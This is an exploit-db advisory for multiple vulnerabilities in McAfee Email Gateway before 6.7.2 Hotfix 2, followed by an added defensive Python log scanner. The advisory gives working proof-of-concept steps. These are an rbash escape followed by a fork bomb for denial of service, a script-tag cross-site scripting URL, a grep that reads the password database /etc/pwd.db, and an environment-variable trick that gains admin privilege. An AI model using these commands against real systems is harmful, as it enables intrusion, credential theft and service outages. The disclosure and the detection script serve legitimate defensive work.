McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities

  • Author: Nahuel Grisolia
    Date: 2010-04-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33819/
  • source: https://www.securityfocus.com/bid/39242/info
    
    McAfee Email Gateway (formerly IronMail) is prone to multiple vulnerabilities, including:
    
    A local privilege-escalation vulnerability
    A denial-of-service vulnerability
    Multiple cross-site scripting vulnerabilities
    An information-disclosure vulnerability
    
    An attacker may leverage these issues to completely compromise affected computers, execute arbitrary commands and script code, steal cookie-based authentication credentials, crash the affected application and gain access to sensitive information. Other attacks are also possible.
    
    Versions prior to McAfee Email Gateway 6.7.2 Hotfix 2 are vulnerable. 
    
    
    Denial of Service:
    
    * In order to run the DoS, follow the steps below:
    [Secure Mail]: command rbash --noprofile
    [Secure Mail]: :(){:|:&};:
    
    Cross-Site Scripting:
    
    https://www.example.com/admin/queuedMessage.do?method=getQueueMessages&queueMsgType=<script>alert("XSS");</script>&QtnType=9
    
    Information Disclosure:
    
    [Secure Mail]: command rbash --noprofile
    [Secure Mail]: grep -a '.*' /etc/pwd.db
    
    Local Privilege-Escalation:
    
    [Secure Mail]: command rbash --noprofile
    [Secure Mail]: declare -x USER="admin"
    If you want to check the new privilege:
    [Secure Mail]: cmd_admin set user unlock
    *** Invalid command: Usage - set user unlock <USER ID> ***
    [Secure Mail]: cmd_admin set user unlock admin
    Cannot unlock yourself.
    [Secure Mail]: exi
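
A defender's view of the cross-site scripting request shown above, as an added example that is not part of the original advisory: a log check that flags requests to `/admin/queuedMessage.do` whose `queueMsgType` value decodes to markup. The access-log layout, the sample lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint and parameter from the advisory's proof-of-concept URL.
ENDPOINT = "/admin/queuedMessage.do"
PARAM = "queueMsgType"
# Characters that indicate markup injected into the parameter.
MARKUP = re.compile(r"[<>\"'`]")
# Assumed access-log layout: the request is logged as "METHOD target HTTP/x.y".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (not taken from a real appliance).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2010:10:00:01 +0000] "GET /admin/queuedMessage.do?method=getQueueMessages&queueMsgType=1&QtnType=9 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [06/Apr/2010:10:02:13 +0000] "GET /admin/queuedMessage.do?method=getQueueMessages&queueMsgType=%3Cscript%3Ealert(%22XSS%22)%3B%3C/script%3E&QtnType=9 HTTP/1.1" 200 5301',
    '192.0.2.44 - - [06/Apr/2010:10:02:40 +0000] "GET /admin/queuedMessage.do?method=getQueueMessages&queueMsgType=%253Cscript%253E&QtnType=9 HTTP/1.1" 200 5290',
    '192.0.2.10 - - [06/Apr/2010:10:03:00 +0000] "GET /admin/login.do?queueMsgType=%3Cb%3E HTTP/1.1" 200 900',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for requests whose PARAM carries markup."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # Ignore a ";jsessionid=..." suffix on the path when comparing.
        if target.path.split(";")[0] != ENDPOINT:
            continue
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == PARAM:
                value = decode_fully(value)  # parse_qsl already decoded once
                if MARKUP.search(value):
                    hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {PARAM}={value!r}")
```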